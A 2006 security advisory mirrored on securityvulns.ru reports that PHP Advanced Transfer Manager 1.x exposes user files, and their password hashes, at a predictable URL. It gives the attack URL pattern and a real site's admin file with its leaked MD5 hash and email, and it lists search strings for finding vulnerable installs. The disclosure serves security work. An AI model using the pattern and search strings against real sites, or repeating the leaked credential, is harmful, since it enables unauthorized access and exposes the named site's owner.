Computer Security

Security Advisory: PHP Advanced Transfer Manager Download users password hashes
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [KAPDA::
#26]vBulletin.3.5.
3~3.0.12-XSS

  SMBlog Remote Command Exucetion

  4images <=1.7.1 remote code execution

  Active XSS in Invision Power Board 2.1.4

From::) :) <liz0_(at)_bsdmail.com>
Date:02.03.2006
Subject:PHP Advanced Transfer Manager Download users password hashes

PHP Advanced Transfer Manager Download users password hashes

PHP Advanced Transfer Manager 1.*

Site:http://phpatm.free.fr/
----------------------------------------------------
Bugs:

http://victim.com/path/users/username
----------------------------------------------------
example:

http://www.sarima.co.za/doclib/users/Admin


3a23bb515e06d0e944ff916e79a7775c ------>md5
0
sarima@sarima.co.za
0
1

1
1026836078
en


----------------------------------------------------

Vulnerabilities :
"Powered by PHP Advanced Transfer Manager v1.00"
"Powered by PHP Advanced Transfer Manager v1.01"
"Powered by PHP Advanced Transfer Manager v1.02"
"Powered by PHP Advanced Transfer Manager v1.03"
"Powered by PHP Advanced Transfer Manager v1.22"
"Powered by PHP Advanced Transfer Manager v1.21"
"Powered by PHP Advanced Transfer Manager v1.20"
"Powered by PHP Advanced Transfer Manager v1.30"
-----------------------------------------------------
Credit :Liz0ziM
Website:www.biyosecurity.com
Mail   :liz0@bsdmail.com

------------------------------------------------------

Source:

http://www.blogcu.com/Liz0ziM/316652/
http://biyosecurity.be/bugs/patm.txt


--
_______________________________________________
Get your free email from http://mymail.bsdmail.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru